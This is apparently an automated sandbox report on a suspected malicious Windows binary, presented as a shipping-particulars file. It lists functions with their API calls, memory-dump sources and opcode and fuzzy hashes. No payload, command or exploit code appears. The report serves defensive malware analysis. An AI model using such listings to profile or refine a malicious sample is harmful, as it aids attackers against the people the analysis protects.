                              • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                              Function 00434582 Relevance: 7.6, APIs: 5, Instructions: 61sleepCOMMON
                              Download Yara Rule
                              APIs
                              • Sleep.KERNEL32(00000000), ref: 00434598
                              • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                              • Sleep.KERNEL32(00000000), ref: 004345D4
                              • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: CounterPerformanceQuerySleep
                              • String ID:
                              • API String ID: 2875609808-0
                              • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                              • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                              • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                              • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
                              Function 00460C01 Relevance: 7.5, APIs: 5, Instructions: 48windowtimeCOMMON
                              Download Yara Rule
                              APIs
                              • GetDlgItem.USER32(?,000003E9), ref: 00460C17
                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
                              • MessageBeep.USER32(00000000), ref: 00460C46
                              • KillTimer.USER32(?,0000040A), ref: 00460C68
                              • EndDialog.USER32(?,00000001), ref: 00460C83
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: BeepDialogItemKillMessageTextTimerWindow
                              • String ID:
                              • API String ID: 3741023627-0
                              • Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                              • Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
                              • Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                              • Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
                              Function 004556A0 Relevance: 7.5, APIs: 5, Instructions: 45windowCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Destroy$DeleteObjectWindow$Icon
                              • String ID:
                              • API String ID: 4023252218-0
                              • Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                              • Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
                              • Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                              • Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
                              Function 004555ED Relevance: 7.5, APIs: 5, Instructions: 43windowCOMMON
                              Download Yara Rule
                              APIs
                              • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                              • DeleteObject.GDI32(?), ref: 00455736
                              • DeleteObject.GDI32(?), ref: 00455744
                              • DestroyIcon.USER32(?), ref: 00455752
                              • DestroyWindow.USER32(?), ref: 00455760
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: DeleteDestroyObject$IconMessageSendWindow
                              • String ID:
                              • API String ID: 1489400265-0
                              • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                              • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                              • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                              • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
                              Function 00455607 Relevance: 7.5, APIs: 5, Instructions: 42windowCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                              • DestroyWindow.USER32(?), ref: 00455728
                              • DeleteObject.GDI32(?), ref: 00455736
                              • DeleteObject.GDI32(?), ref: 00455744
                              • DestroyIcon.USER32(?), ref: 00455752
                              • DestroyWindow.USER32(?), ref: 00455760
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                              • String ID:
                              • API String ID: 1042038666-0
                              • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                              • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
                              • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                              • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
                              Function 0042FD29 Relevance: 7.5, APIs: 5, Instructions: 36COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Path$ObjectStroke$DeleteFillSelect
                              • String ID:
                              • API String ID: 2625713937-0
                              • Opcode ID: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                              • Instruction ID: 382768f54733291aaafbd4c53fc5fd67df7ff3e11fccf1fbf51b229105ba29ed
                              • Opcode Fuzzy Hash: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                              • Instruction Fuzzy Hash: B3F036751125109BD3519F28FD4875E3B68E747321F94423AEA15923F0CB785449CB6D
                              Function 00417803 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • __getptd.LIBCMT ref: 0041780F
                                • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                              • __getptd.LIBCMT ref: 00417826
                              • __amsg_exit.LIBCMT ref: 00417834
                              • __lock.LIBCMT ref: 00417844
                              • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                              • String ID:
                              • API String ID: 938513278-0
                              • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                              • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                              • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                              • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                              Function 00413D0E Relevance: 7.5, APIs: 5, Instructions: 24threadCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                              • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                              • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                              • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                              • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                              • ExitThread.KERNEL32 ref: 00413D4E
                              • GetCurrentThreadId.KERNEL32 ref: 00413D54
                              • __freefls@4.LIBCMT ref: 00413D74
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                              • String ID:
                              • API String ID: 2403457894-0
                              • Opcode ID: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                              • Instruction ID: 99982f4671f9afe760f134679f3a1374bf557b67af872bc9692f731b59fefeca
                              • Opcode Fuzzy Hash: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                              • Instruction Fuzzy Hash: 1AE04F318443056B8F013BB39C1E8CF363C9E0434AB20082ABE1493112DA2C99C1C6BE
                              Function 004151AF Relevance: 7.5, APIs: 5, Instructions: 22threadCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                              • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                              • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                              • ___fls_setvalue@8.LIBCMT ref: 004151DD
                              • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                              • ExitThread.KERNEL32 ref: 004151ED
                              • __freefls@4.LIBCMT ref: 00415209
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                              • String ID:
                              • API String ID: 4247068974-0
                              • Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                              • Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
                              • Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                              • Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
                              Function 0044F405 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 302COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID:
                              • String ID: )$U$\
                              • API String ID: 0-3705770531
                              • Opcode ID: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                              • Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
                              • Opcode Fuzzy Hash: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                              • Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15
                              Function 0046E48D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 263comCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                              • CoInitialize.OLE32(00000000), ref: 0046E505
                              • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                              • CoUninitialize.OLE32 ref: 0046E53D
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: CreateInitializeInstanceUninitialize_wcslen
                              • String ID: .lnk
                              • API String ID: 886957087-24824748
                              • Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                              • Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
                              • Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                              • Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                              Function 0044E180 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: _memmove
                              • String ID: \
                              • API String ID: 4104443479-2967466578
                              • Opcode ID: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                              • Instruction ID: 90b25fc4546a2c21e21e7939c456fa175a28996bec6c3309f7edcf8d77039fcb
                              • Opcode Fuzzy Hash: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                              • Instruction Fuzzy Hash: 8AB1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                              Function 0044E189 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: _memmove
                              • String ID: \
                              • API String ID: 4104443479-2967466578
                              • Opcode ID: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                              • Instruction ID: 47d8400a167da4587eb122393216330e55bf30386b581c043e0675457d4a745f
                              • Opcode Fuzzy Hash: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                              • Instruction Fuzzy Hash: F1B1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                              Function 0044E199 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 260COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: _memmove
                              • String ID: \
                              • API String ID: 4104443479-2967466578
                              • Opcode ID: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                              • Instruction ID: 4d1558bed40bbae7f26d93592334ac0d2c658ca85fbb7fec499742c135aa7d63
                              • Opcode Fuzzy Hash: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                              • Instruction Fuzzy Hash: E5A1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED441AB381D7795946CB1A
                              Function 0046A6E1 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 241COMMON
                              Download Yara Rule
                              Strings
                              • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                              • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                              • API String ID: 708495834-557222456
                              • Opcode ID: ad57006ec1c627c896323e780c1188bc9069f79cba7bd3d755793e69e2ee2a80
                              • Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
                              • Opcode Fuzzy Hash: ad57006ec1c627c896323e780c1188bc9069f79cba7bd3d755793e69e2ee2a80
                              • Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
                              Function 0043659E Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 162windowCOMMON
